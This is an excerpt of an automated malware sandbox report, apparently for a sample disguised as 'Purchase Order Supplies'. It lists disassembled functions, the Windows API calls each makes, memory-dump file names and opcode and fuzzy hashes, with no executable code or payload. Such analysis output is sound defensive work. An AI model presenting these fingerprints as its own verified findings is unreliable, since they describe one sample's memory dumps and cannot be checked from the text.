                          • Instruction ID: 897d7038e67338fb82c70b1c208caed969432b84515cccaded26a2475eea8800
                          • Opcode Fuzzy Hash: 62be54aff8397159c8942ebe69c08661c0b1fccbb7d02c8891a89aa6d47f70e3
                          • Instruction Fuzzy Hash: 4751B435700115AFCF04EFA8C995EAD77EAAF49314B1441A9F50A9B392DB30ED05EB90
                          Function 00C9B6D0 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          • Opcode ID: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                          • Instruction ID: 36fcdef085ad5591e9dcde2cc1f540579e89fe466d39d4580795e18ac330fdef
                          • Opcode Fuzzy Hash: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                          • Instruction Fuzzy Hash: DE41D079200602EFCB14DF5AE584A62F3E4FF88360714C56EE89A87751D730EC52DB20
                          Function 00C94EE9 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                          Download Yara Rule
                          APIs
                          • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00C94F8F
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          • Opcode ID: 87acce4fd8400229500a501997f0da2d3e8734ac93671835b22480425996b66c
                          • Instruction ID: 10e330f06ae7cbbd98f77868abe1708b0c149c67352ad86c79b901be801a56b3
                          • Opcode Fuzzy Hash: 87acce4fd8400229500a501997f0da2d3e8734ac93671835b22480425996b66c
                          • Instruction Fuzzy Hash: 76313B71A00616AFCF08CFADD488AADB7B5BF48310F148629E81997754D770BA91CB90
                          Function 00CAF92C Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: select
                          • String ID:
                          • API String ID: 1274211008-0
                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                          • Instruction ID: ab7dfd891030634bc0c92a8625b5faad7447cee65209552aa5b256e50923d8b1
                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                          • Instruction Fuzzy Hash: 1131EE70A00106ABD714DFA9D480A6EF7B5FF4A304B2482A9E459CB255D731EEC2DBD0
                          Function 00D0AA5A Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID:
                          • API String ID: 1473721057-0
                          • Opcode ID: ef176648a821b6d3cc1f819b5303e48b195a3ac61d38fa06a67693ae80a282c0
                          • Instruction ID: f7c486deb587a25168d1e76c48561b127fdba3a9a9afe460b93094b50c1c1ca2
                          • Opcode Fuzzy Hash: ef176648a821b6d3cc1f819b5303e48b195a3ac61d38fa06a67693ae80a282c0
                          • Instruction Fuzzy Hash: E2414E74504752CFEB24CF19C444B1ABBE1BF49358F29859CE99A4B362C372E885CF52
                          Function 00C94D67 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          • Opcode ID: af2aa384e551d168b78e5b05191074926328fffe3f2d8aa568180666f35e57af
                          • Instruction ID: d5169b63e168f83c9ae36a09b13c801a87f501ee03c089d07521ff8b1a877b33
                          • Opcode Fuzzy Hash: af2aa384e551d168b78e5b05191074926328fffe3f2d8aa568180666f35e57af
                          • Instruction Fuzzy Hash: F421FDB5A00708EBCF149F15E844BAE7BF8EB96340F21846DE58AD2250EB30D5D1D7A6
                          Function 00C9D805 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          • Opcode ID: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                          • Instruction ID: 7827b33fcbd53f287c10f248c01f2bbbc44f2d92cc46eb92fc5d916e780c9984
                          • Opcode Fuzzy Hash: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                          • Instruction Fuzzy Hash: AB115E75600605DFCB24DF28D481956B7F9FF49354B20C46EE88ECB662E732E841DB94
                          Function 00C93F9B Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C93F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00C93F90
                          • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00C934E2,?,00000001), ref: 00C93FCD
                            • Part of subcall function 00C93E78: FreeLibrary.KERNEL32(00000000), ref: 00C93EAB
                            • Part of subcall function 00C94010: _memmove.LIBCMT ref: 00C9405A
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Library$Free$Load_memmove
                          • String ID:
                          • API String ID: 3640140200-0
                          • Opcode ID: e3488bc3c0505c6e49aa2222f535162f0f8c54cad99a21aa17709ca89ec40341
                          • Instruction ID: ba9127a0dd4d6c43fd5d15a0da25a881342d2a1a99ec2c33ff50e165e82c61d3
                          • Opcode Fuzzy Hash: e3488bc3c0505c6e49aa2222f535162f0f8c54cad99a21aa17709ca89ec40341
                          • Instruction Fuzzy Hash: 9A11A332610219BACF14AF64DC0AF9E77A59F50B04F108829F942EA1C1DB749E45BB60
                          Function 00D0AB2A Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID:
                          • API String ID: 1473721057-0
                          • Opcode ID: 153475b98d71e153b2f5255b325bb270ecad5ceb2dbfc381d39879ea83188d4a
                          • Instruction ID: ba1783069472fd75e7642c56e1c4732ea3e2d74daf9e34cb9c8552bbe0cbcc6f
                          • Opcode Fuzzy Hash: 153475b98d71e153b2f5255b325bb270ecad5ceb2dbfc381d39879ea83188d4a
                          • Instruction Fuzzy Hash: 6B212570508702CFEB24DF29C444B1BBBE2BF8A348F25496CE99647662C731E845DF52
                          Function 00CF10E5 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: 81f2d49206d1e1ba1f8db45c6f03b60611dad73daf130153e09e9a608dadbbe0
                          • Instruction ID: 6c3bf2f36308bab65b66a3ed7e594b25c9517be5a529f90d96a1cf0d984534ef
                          • Opcode Fuzzy Hash: 81f2d49206d1e1ba1f8db45c6f03b60611dad73daf130153e09e9a608dadbbe0
                          • Instruction Fuzzy Hash: 4D118F36201219DFDB50CF19C480AAE77E9BF49760B09816AEE568B351CB30AD418B92
                          Function 00C94CA0 Relevance: 1.6, APIs: 1, Instructions: 51fileCOMMON
                          Download Yara Rule
                          APIs
                          • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,00000000,00000000,?,00C94E69,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00C94CF7
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 03e44b7bed40ba0c61bbc87375366464553d83b54bb40928be53c0457603f3a9
                          • Instruction ID: e6e58cc5a0adfa93af3ac504dc163daeafe5be2077437a64d8f0024f4845537c
                          • Opcode Fuzzy Hash: 03e44b7bed40ba0c61bbc87375366464553d83b54bb40928be53c0457603f3a9
                          • Instruction Fuzzy Hash: EE117931201B04AFDB28CF06C888F66B7E9EF44354F10C41EE5AA86A50C7B1F946CB60
                          Function 00C94D29 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          • Opcode ID: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
                          • Instruction ID: 00e4a724cec19eacc37ae05ab811752c56797cb450688e9e4ff0c421d5cb4ad9
                          • Opcode Fuzzy Hash: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
                          • Instruction Fuzzy Hash: B60171B9201542AFC7059B29C955D39F7A9FF853107148159E419C7742DB30AC22D7E0
                          Function 00C9CAEE Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          • Opcode ID: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                          • Instruction ID: 9a88404a1395fe3e322fbc33f27430aceddacca91fb4ece539a47f5c2458241c
                          • Opcode Fuzzy Hash: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                          • Instruction Fuzzy Hash: 0901F972200705AFD7149B79C80BA67BB98DF487A0F50852EF95ACB1D1EB71E500AB90
                          Function 00CAF2D0 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          • Opcode ID: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                          • Instruction ID: ba642f18900286dd63d8e26b77128d4931884f2cfc4629bab7f9c5aa63a3ac3a
                          • Opcode Fuzzy Hash: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                          • Instruction Fuzzy Hash: 48012B71005602EBCF20AFA8D804E5FBBA89F83320B10453DF85843261D7319816A7B0
                          Function 00CE95AF Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                          Download Yara Rule
                          APIs
                          • WSAStartup.WS2_32(00000202,?), ref: 00CE95C9
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Startup
                          • String ID:
                          • API String ID: 724789610-0
                          • Opcode ID: 0d68e46942d27d940ad8d70d8f3bf154fe0a5336cf377704eed2070654efc452
                          • Instruction ID: 03c2bc40df3d3fb6dc79d31c605c9e19611e3bbd99d54ee123678a5cf0940748
                          • Opcode Fuzzy Hash: 0d68e46942d27d940ad8d70d8f3bf154fe0a5336cf377704eed2070654efc452
                          • Instruction Fuzzy Hash: 73E0E5336043156BC310EA64DC05AABB799BF85720F04875ABDA5873C1DB30D814C3D1
                          Function 00C93E39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                          Download Yara Rule
                          APIs
                          • FreeLibrary.KERNEL32(?,?,?,?,?,00C934E2,?,00000001), ref: 00C93E6D
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: c5446648351f729bb690334fc847d9ff7215b038e267973899d28d4ce818b236
                          • Instruction ID: 5d678d86028ec51aafa0cdd10ad79ad42b7afc1f41423f2c95e3c14625144991
                          • Opcode Fuzzy Hash: c5446648351f729bb690334fc847d9ff7215b038e267973899d28d4ce818b236
                          • Instruction Fuzzy Hash: ABF03971505791DFCF349F65D498853BBE1EF147193248A3EE1E682621C7319E44DF20
                          Function 00CD79F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                          Download Yara Rule
                          APIs
                          • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00CD7A11
                            • Part of subcall function 00C97E53: _memmove.LIBCMT ref: 00C97EB9
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: FolderPath_memmove
                          • String ID:
                          • API String ID: 3334745507-0
                          • Opcode ID: 69aa039acb68e6725a078031c45b809892b888872d3e4557010ba52bdb05e213
                          • Instruction ID: a775433d4b6a75a9b5312a86efaf223b190e31b2e3732fdf9d82a6e33f77fdcf
                          • Opcode Fuzzy Hash: 69aa039acb68e6725a078031c45b809892b888872d3e4557010ba52bdb05e213
                          • Instruction Fuzzy Hash: 90D05EA66002283FDF50E6649C0DDFB36ADC744104F0042A0B86DD2142EA20AE4586F0
                          Function 00CD6852 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CD6623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,00CD685E,?,?,?,00D04A5C,00D2E448,00000003,?,?), ref: 00CD66E2
                          • WriteFile.KERNEL32(?,?,00D522E8,00000000,00000000,?,?,?,00D04A5C,00D2E448,00000003,?,?,00C94C44,?,?), ref: 00CD686C
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: File$PointerWrite
                          • String ID:
                          • API String ID: 539440098-0
                          • Opcode ID: 349d5581cd4e2835ba2b6d0e4806877b06b8dfa94f4bf53256a8a8a614123335
                          • Instruction ID: 45f8c50e968a8b673593faa1445eb1eaafedc530186cddf6afe22a9b9034cefd
                          • Opcode Fuzzy Hash: 349d5581cd4e2835ba2b6d0e4806877b06b8dfa94f4bf53256a8a8a614123335
                          • Instruction Fuzzy Hash: F4E0B636400318BBDB20AF94D805ACABBB9EB08754F10451AF94195151D7B5EA54DBA4
                          Function 00C9193B Relevance: 1.5, APIs: 1, Instructions: 18windowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C91952
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSendTimeout
